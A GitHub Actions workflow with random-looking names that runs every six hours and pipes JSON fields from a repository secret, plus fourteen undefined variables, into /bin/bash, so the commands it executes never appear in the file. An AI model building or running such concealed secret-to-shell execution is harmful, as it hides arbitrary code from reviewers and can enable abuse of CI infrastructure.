name: wangyinzi1234
on:
  workflow_dispatch:
  schedule:
    - cron: '15 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wangyinzi1234
        env:
          l03: ${{ secrets.l03 }}
        run: |
          echo $l03 | jq -r .gjfb7407 | /bin/bash
          echo $h501 | jq -r .m21191 | /bin/bash
          echo $s3 | jq -r .rrtc96782 | /bin/bash
          echo $o8917 | jq -r .f176 | /bin/bash
          echo $px5 | jq -r .sckyc365 | /bin/bash
          echo $qzu60 | jq -r .sb17 | /bin/bash
          echo $zgapr40828 | jq -r .noke6258 | /bin/bash
          echo $qrc31 | jq -r .ap1 | /bin/bash
          echo $i7720 | jq -r .oozfd6 | /bin/bash
          echo $gx81738 | jq -r .si0 | /bin/bash
          echo $ybiwp59 | jq -r .rfjjd623 | /bin/bash
          echo $i17684 | jq -r .vxi871 | /bin/bash
          echo $wos6260 | jq -r .upjff427 | /bin/bash
          echo $kgrk789 | jq -r .qmdec605 | /bin/bash
          echo $zkmp70 | jq -r .xb33 | /bin/bash

